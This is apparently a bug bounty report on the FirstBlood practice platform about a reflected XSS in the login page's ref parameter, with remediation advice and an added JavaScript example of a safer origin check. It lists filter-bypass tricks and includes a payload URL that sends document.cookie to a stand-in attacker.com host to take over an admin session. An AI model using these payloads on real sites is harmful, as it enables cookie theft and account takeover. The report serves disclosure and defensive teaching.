FirstBlood-#154 — Reflective XSS on /login.php endpoint through the vulnerable `ref` parameter
This issue was discovered on FirstBlood v1
On 2021-05-10, holybugx Level 5 reported:
Description
Hello Sean,
I found out that there is a reflected XSS on the /login.php endpoint through the vulnerable ref parameter, which leads to account takeover.
Steps to reproduce
- Open the following link:
http://firstbloodhackers.com/login.php?action=login&ref=ja%09vascript:confirm`1`
- Click on "Return to previous page" and the XSS pops up:
![](https://res.cloudinary.com/bugbountynotes/image/upload/v1620683349/zbcyj3nujjckq3co59cf.png)
Filter bypass
I found out that certain keywords are being blocked and removed. I realized the javascript keyword is being removed, so I tried a couple of encoding tricks such as java%09script, but then I realized that with this payload the java keyword is removed; I also realized the alert keyword and ( are being removed.
I used the following tricks to bypass the filtering:
- javascript --> ja%09vascript
- alert --> confirm
- ( ) --> ``
Bypass explanation
- You can use multiple encoding/Unicode tricks to bypass the javascript keyword being removed; examples are:
  ja%09vascript
  ja%0avascript
  ja%0dvascript
- You can use confirm or prompt if keywords such as alert are blocked.
- When parentheses are filtered you can either use `` as I did, or in some cases you can use encoding tricks such as HTML encoding or URL encoding/double URL encoding:
  confirm(1) --> confirm`1`
Exploitation
An attacker can craft a payload to steal cookies; an example of such a payload is:
http://firstbloodhackers.com/login.php?ref=ja%09vascript:window.location.href=%60http://attacker.com/$%7Bdocument.cookie%7D%60
Where http://attacker.com is the attacker's domain. Opening the above link and clicking on "Return to previous page" results in a redirection to the attacker's domain, and the cookies are sent to the attacker's server.
![](https://res.cloudinary.com/bugbountynotes/image/upload/v1620687028/bj1nasw8ulgiwehx0hbt.png)
An attacker can set this cookie in his browser to access drAdmin (Administrator).
This happens because of two cookie misconfigurations:
- Cookies are not set as HttpOnly, which makes it possible for an attacker to steal cookies using JavaScript.
- Cookies are not deleted/expired as they are meant to be after logging out, which makes it possible for an attacker to re-use the cookies whenever he wants to:
Set-Cookie: drps=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Remediation
- The ref parameter should not be controlled by users.
- Preferably set HttpOnly cookies so that JavaScript can not be used to steal cookies.
Impact
- Account takeover
Best regards,
HolyBugx
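The filter bypass and the ref remediation from the report, as an added example that is not part of the report or of the FirstBlood code base. The keyword-stripping filter is an assumed reconstruction from the report's description (the real login.php code is not on the page), and SITE_ORIGIN, naiveRefFilter, effectiveScheme and safeReturnTarget are names chosen here. It shows why the tab-split payload survives a blocklist and how an origin check on the parsed URL does not depend on which characters the attacker hid inside the scheme:

```javascript
// Added example, not code from the report or from FirstBlood.
const SITE_ORIGIN = "http://firstbloodhackers.com"; // origin used in the report's URLs

// Assumed model of the vulnerable filter: blocked keywords and parentheses are
// simply deleted from the raw ref value, nothing else is checked.
function naiveRefFilter(ref) {
  return ref.replace(/javascript|alert|\(|\)/gi, "");
}

// The report's payload as PHP would see it after URL-decoding (%09 is a tab).
const REPORT_PAYLOAD = "ja\tvascript:confirm`1`";

// What the browser does with the filtered value when the user clicks the link:
// WHATWG URL parsing strips ASCII tab/newline before reading the scheme, so
// "ja\tvascript:" is still a javascript: URL. Returns the parsed scheme or null.
function effectiveScheme(href) {
  try {
    return new URL(href, SITE_ORIGIN).protocol;
  } catch {
    return null;
  }
}

// Hardened replacement for the blocklist: resolve ref against the site's own
// origin and accept only same-origin targets, otherwise return a fixed page.
// javascript:, data:, protocol-relative (//host) and absolute off-site URLs all
// fail the origin comparison regardless of the encoding tricks used.
function safeReturnTarget(ref, fallback = "/") {
  let url;
  try {
    url = new URL(ref, SITE_ORIGIN);
  } catch {
    return fallback;
  }
  if (url.origin !== SITE_ORIGIN) return fallback;
  return url.pathname + url.search; // emit a relative path; drop any fragment
}
```

The naive filter leaves the report's payload untouched because the tab breaks the "javascript" match, while the browser removes that same tab before deciding the scheme; the safe version makes the decision on the parsed URL, which is the only representation the browser will act on.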
P3 Medium
Parameter:
Payload:
FirstBlood ID: 3
Vulnerability Type: Reflective XSS
The parameter "ref" is vulnerable to XSS on login.php. The developer has tried to prevent a malicious actor from redirecting to a javascript URI but the attempt to stop this was poor and thus it can be bypassed.